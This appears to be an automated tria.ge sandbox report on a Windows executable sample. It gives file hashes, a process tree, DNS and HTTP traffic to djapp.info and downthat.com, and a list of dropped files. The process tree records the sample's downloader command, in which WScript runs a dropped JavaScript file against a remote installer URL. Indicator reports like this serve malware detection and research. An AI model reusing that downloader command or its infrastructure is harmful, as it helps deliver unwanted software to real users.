Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

2d7a5218cf...18.exe

windows7-x64

8

2d7a5218cf...18.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    10/05/2024, 05:00 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2d7a5218cf398889972c481ac03b4884_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    2d7a5218cf398889972c481ac03b4884

  • SHA1

    606db8a4498673c603cf3b03e6e6bf42d84c282c

  • SHA256

    02ceb479a7e2c6479c9f087a7584a8a7c875c9bacdbff33ac66c0c584839e5cf

  • SHA512

    b3d549c68ea0b7f27f8d69e616167e076e44f5635db6a7fb1a6f0747c2ac86997ea0e5dc2f7cc3b1095c494b7637a199d1deb5cbd293e9d6b16ff53914f7abff

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3E:/7BSH8zUB+nGESaaRvoB7FJNndnR

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2d7a5218cf398889972c481ac03b4884_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\2d7a5218cf398889972c481ac03b4884_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf120A.js" http://www.djapp.info/?domain=PpKiMVcnzr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf120A.exe
      2⤵
      • Blocklisted process makes network request
      PID:2228
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf120A.js" http://www.djapp.info/?domain=PpKiMVcnzr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf120A.exe
      2⤵
      • Blocklisted process makes network request
      PID:2652
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf120A.js" http://www.djapp.info/?domain=PpKiMVcnzr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf120A.exe
      2⤵
      • Blocklisted process makes network request
      PID:1264
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf120A.js" http://www.djapp.info/?domain=PpKiMVcnzr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf120A.exe
      2⤵
      • Blocklisted process makes network request
      PID:2156
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf120A.js" http://www.djapp.info/?domain=PpKiMVcnzr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf120A.exe
      2⤵
      • Blocklisted process makes network request
      PID:2712

Network

  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    bi.downthat.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    bi.downthat.com
    IN A
    Response
    bi.downthat.com
    IN CNAME
    traff-2.hugedomains.com
    traff-2.hugedomains.com
    IN CNAME
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.253.23
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.204.160
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 10 May 2024 05:00:45 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    www.hugedomains.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.hugedomains.com
    IN A
    Response
    www.hugedomains.com
    IN A
    104.26.6.37
    www.hugedomains.com
    IN A
    104.26.7.37
    www.hugedomains.com
    IN A
    172.67.70.191
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 05:00:46 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: site_version_phase=108; expires=Mon, 05-May-2025 05:00:46 GMT; path=/
    set-cookie: site_version=HDv3; expires=Mon, 05-May-2025 05:00:46 GMT; path=/
    set-cookie: captcha-tracker=; expires=Thu, 09-May-2024 05:00:46 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tlm4iOUzfm%2FaYqk2ZL3Rhvj7AZGwlLrJ0M6BVdc%2FjX34FIz3gnS8TOXgYDaIrVupnWrbBQVD7QyzO8%2FGK%2FEm6fEPZX17GZkTNZRRMUFvRntdiSBOjNdZfz4rIC6fgp1X5ieB4Js%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88175e178d7724e9-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 10 May 2024 05:00:51 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 05:00:52 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Thu, 09-May-2024 05:00:52 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dCzmsqjyfCzj6Gm5rbH%2FfVcwLtOKyxrAYiFCUZZDLPxk9IT5RUd%2BxX0sz93D4bT9esvHpfAztyvSX0IGUwbb0cuO%2FiFGenMRyyK0VpVjykjvCoAkkB7Fs4oB9c0GWRQqtW4Grfg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88175e3aee3b48b6-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 10 May 2024 05:00:57 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 05:00:58 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Thu, 09-May-2024 05:00:58 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Errw6RM72%2FVG%2BGifcoX38ZrVuwSL%2FKEUZQERwmj65VHkB5uiqyao5JLLmCDmh9QDMI5xNkvRwiYAvGefAnuc6rkgrdWabE7BTGM1cZMnYQ%2FXN4fQXXzoawtpicXLJiG080NNpg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88175e619a4a9577-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 10 May 2024 05:01:03 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 05:01:04 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Thu, 09-May-2024 05:01:04 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ffwLcJdYzbJ0qRp%2F9pPFTPLSQg2TMe6RZ%2BjKrPD0wchbQHVZ%2FN3xmFCWicl5GVPSW1NGsLXdB9%2Ft%2BoTcZnjf5TgajE9fhogimU9xnpIbnp254NFzft4gikUqnzfcnJ0GaDjyVIw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88175e88bdf252db-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 10 May 2024 05:01:10 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 05:01:11 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOZuIL%2FdNPnrG%2FPaRULgThV9gU4K8EOsSCBLTASd4CjfX%2FZ1RkJkfsjWBDgLHdBean1hqtEcx8r21kSMCUBUDUcBitbvM%2BucGZFFzOF1UCs5sXBIymCnbaFqgcY26si1UeXXzsc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88175eb02e377726-LHR
    Content-Encoding: gzip
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
     243 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
     10.3kB
     13
    15

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
     243 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
     9.2kB
     11
    13

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
     243 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
     9.2kB
     11
    13

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
     243 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
     9.1kB
     11
    13

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
     243 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.5kB
     16.2kB
     15
    21

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    120 B
     278 B
     2
    2

    DNS Request

    www.djapp.info

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    bi.downthat.com
    dns
    WScript.exe
    61 B
     191 B
     1
    1

    DNS Request

    bi.downthat.com

    DNS Response

    3.130.253.23
    3.130.204.160

  • 8.8.8.8:53
    www.hugedomains.com
    dns
    WScript.exe
    65 B
     113 B
     1
    1

    DNS Request

    www.hugedomains.com

    DNS Response

    104.26.6.37
    104.26.7.37
    172.67.70.191

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize

    1KB

    MD5

    b6e71adf7324685d8f60c97bdb99f892

    SHA1

    ac45dd58c3dfb5d68ffdbc27817f1e5ad5720830

    SHA256

    40a181e9a8b85b862afc89a604eb290be3b5cd68937feb9ccfc467d3589e8e5c

    SHA512

    f864a712e300632059c0678ff5f54412fc7f7a1db02e469bcdc77be452886b55cd3d08ff51076278d1a21b091b2fc459e30c53b0d8e8855dbfefa59f0ee4cea9

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize

    410B

    MD5

    cbe599fb8261a92646b4c7eb83343597

    SHA1

    a7a29639543b2f2be4c53ad89b3972f819f2f478

    SHA256

    f26e135b05da1dd76fcab475f2c99d26cbd516077b8203cf6bba50ca1b50fe2b

    SHA512

    78f9a9018613e605ccb01379f40010e46c07f630825637b85ba8629a80c7c0f4e694df1ad1d59d3de45095986e384a07bb21eac260a3c3dd5b99b6b76083ab26

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    b1933b7a3af87e9acc129f894e0da496

    SHA1

    7eec05a557f4dd4356cacbd19b51d5ccb4d1d4ef

    SHA256

    3b3bd57fd1880f76c31e413a0a655a2d523311ead52bfbda90b78e843af92eaf

    SHA512

    0c7a90333d1173670c2ced5613dda98e957aae7945bc985d3b8a953cb4f40d6c96d022859ea84232801055c8023b9e9599f7a0a8c968c58d4017299d9463f6b1

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
    Filesize

    392B

    MD5

    c17a69320f742d008bb48fb6ed10890f

    SHA1

    6f30760a4af1d7a2d5734d60f5dd2f154d07acb9

    SHA256

    d18a4b1f788d66e5f52c6019e6d58b69d061971e3e0a42245068249cbcf75f27

    SHA512

    f7b49407d2ccffcebccdc3f472b74d63054b00267e18672cc8c09260dcb5af7d866008c2693ed0ee6b2d8944b0f9c1aaca771c5133175d7922b7d0ac09ecddd8

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm
    Filesize

    6KB

    MD5

    8bd38a8a936ea081120173234e9f59e3

    SHA1

    d0b655261dd6012872770d7b2d0b02e7c5e2fb7d

    SHA256

    ddef95cb86191c91d1aa3ed8d5f2f6776a7c17a491b00c24b6c8fae1dc2e0a34

    SHA512

    1bbd548193854fe871874f31e892e924edc98967f58d3f05448a2f4a81e4886ca66264b6866c11b6f8b8d2ffab52dd6658660baa4cded4d1ecb14f2138d1b656

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm
    Filesize

    6KB

    MD5

    70930af9fed4ce231e22333e5971a68f

    SHA1

    af36242d8a3b0ff1f98bf0ee68723a7ac425eb77

    SHA256

    9c008b3123108b866112bfd4c74ea854f14d96b0b73e3e537c7679f3a986147b

    SHA512

    620bb2ed1f20b31b9fc65ca2a1dbab54c87aebefb0fea00def82c62e1cacf62de2042dbac23e17462c155edb94cd325d9f8bc2f05696ca95e3fa096cc7b94d84

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm
    Filesize

    6KB

    MD5

    b920a0ce34c904a5895657039f26ce55

    SHA1

    1333e2a5d9aeeed0442cea61af422c36dd524338

    SHA256

    b7261105edf5940654c31f21db75275dd2c64431111ec7829ea284095fd2c905

    SHA512

    ae4d5ea67e211f8d2b06f318a4a80fce571a23862e2162225a2aeb83ce478d49590c15d3bdf04ebd718675ab99b36a04f270fe9decde411175804ea4732ba898

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm
    Filesize

    6KB

    MD5

    2318f906f39c47ef62271fa894b7c535

    SHA1

    0140c5091fb39c2251000ae70ac8010c65c0fe5f

    SHA256

    330d96322c2353489c32728be3bda447e10df668c251fbcd51c42996461c4704

    SHA512

    9f8b197a1f225c936a1b481009f27a3d1a1320dfea265451402dd89b056955c8e08920539759b36f8a67c4703326565eab780c29e8af7a8f5197be945920979c

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab41C1.tmp
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar59E4.tmp
    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\fuf120A.js
    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\FF0A0K5P.txt
    Filesize

    173B

    MD5

    95ab875ac70daa5e680726bf0be2b415

    SHA1

    c57dee695a9a6e5271af050e1ffc0598be81fc7f

    SHA256

    c04e6c9c5bbb4b9def415038c88ce76d966baede66a1f8b828eb1f36eacad26c

    SHA512

    325fc2ce94b612dc28c8971367a3b477e9f211d06e88cc568d1f0c59a6025b27c015d458744ac9e8c28e878c17ae82b537cfa464bbdeb818902644e8f7654b7a

    Download Submit

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.